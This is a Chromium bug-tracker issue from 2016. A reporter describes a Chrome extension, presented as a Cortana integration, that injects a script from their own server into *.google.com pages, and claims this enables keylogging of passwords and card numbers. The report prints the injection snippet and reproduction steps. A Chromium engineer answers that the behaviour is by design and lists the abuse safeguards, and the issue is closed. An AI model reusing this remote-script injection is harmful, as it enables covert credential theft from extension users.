New issue
Advanced search Search tips

Issue 645084 link

Starred by 1 user
Status: WontFix
Owner: ----
Closed: Sep 2016
Cc:
mea...@chromium.org
Components:
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug-Security



Sign in to add a comment

Security: Able to execute an ajax keylogger on *.google.com for 1500&+ persons

Reported by thomasbe...@gmail.com, Sep 8 2016 
I created a google extension used by 1500 persons and gave it the google.com authorisations.
It also include a javascript file in page programticaly locaded on my own server
Now i'm able to execute javascript on any page *.google.com including an ajax keylogger on password and credit cards fields, mouse tracking, redirects, data displayed..


Steps to reproduce:
  1. Create extension with javascript file and *google.com
  2. insert a <script src="domain.com/javascript.js"> in the html/head
  3. insert some malicious script in the remote js file and it will be executed.

Browser/OS: Google Chrome Windows

I tried by including a google analytics code, bout i could have used an onkeypress event and many more.

The extension : https://chrome.google.com/webstore/detail/jakmkngjpkpcjkekgoaenfhanfkfglhp

The url of the script i can introduce in *.google.* webpages https://pom.pm/ginteg/ginteg.js

The code for inserting script in page :
	window.onload = function(){
 var head= document.getElementsByTagName('head')[0];
   var script= document.createElement('script');
   script.type= 'text/javascript';
script.src = "//pom.pm/ginteg/ginteg.js";
   head.appendChild(script);
	}
3.0_0.zip
1.2 KB Download

Comment 1 by thomasbe...@gmail.com, Sep 8 2016 

Analytics of people executing the harmless script
Sans titre.png
49.1 KB View Download

Comment 2 by wfh@chromium.org, Sep 8 2016

Cc: mea...@chromium.org
Components: Platform>Extensions
Labels: -Restrict-View-SecurityTeam Restrict-View-Google
Thanks for your report. this is certainly by design that an extension that requests access to a particular site (or all sites) can perform arbitrary changes to the websites including, but not limited to, injecting scripts into any of those origins.

Chrome deals with these potential issues by having a multi-pronged strategy of anti-abuse and detection to protect our users.

1. There are a robust set of policies that developers agree to before publishing extensions to the webstore:

https://developer.chrome.com/webstore/program_policies

In particular, the extension should describe what it does and it should have a "single purpose" as described here: https://developer.chrome.com/extensions/single_purpose

It appears that if this extension had an embedded keylogger then it would violate the policies here, as e.g. it describes its use as "Google windows 10 integration (Cortana)" and not keylogging.

2. Chrome warns the user when installing the extension that permissions that it requires, and users should be way of extensions that request more permissions than are required.

3. Google has systems and teams that automatically monitor and detect extension abuse.

Comment 3 by wfh@chromium.org, Sep 8 2016

Labels: Needs-Feedback

Comment 4 by penny...@chromium.org, Sep 16 2016

Labels: -Restrict-View-Google
Status: WontFix (was: Unconfirmed)
Haven't heard back from the developer.  Closing wontfix.

b/31367085

Sign in to add a comment